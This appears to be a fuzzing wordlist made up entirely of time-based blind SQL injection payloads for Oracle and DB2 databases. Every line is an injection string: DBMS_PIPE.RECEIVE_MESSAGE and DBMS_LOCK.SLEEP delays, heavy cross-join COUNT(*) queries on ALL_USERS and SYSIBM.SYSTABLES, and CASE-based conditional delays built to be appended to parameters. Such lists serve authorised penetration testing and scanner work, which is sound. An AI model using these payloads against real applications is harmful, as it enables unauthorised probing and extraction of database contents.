AND 1234=DBMS_PIPE.RECEIVE_MESSAGE('abracadabra',5)
OR 1234=DBMS_PIPE.RECEIVE_MESSAGE('abracadabra',5)
AND 1234=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
OR 1234=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
AND 1234=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
OR 1234=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
,(SELECT (CASE WHEN (1234=1234) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
,(SELECT (CASE WHEN (1234=1234) THEN DBMS_PIPE.RECEIVE_MESSAGE('abracadabra',5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
,(BEGIN IF (1234=1234) THEN DBMS_LOCK.SLEEP(5); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
(SELECT (CASE WHEN (1234=1234) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1234 END) FROM DUAL)
(SELECT (CASE WHEN (1234=1234) THEN DBMS_PIPE.RECEIVE_MESSAGE('abracadabra',5) ELSE 1234 END) FROM DUAL)
BEGIN IF (1234=1234) THEN DBMS_LOCK.SLEEP(5); ELSE DBMS_LOCK.SLEEP(0); END IF; END;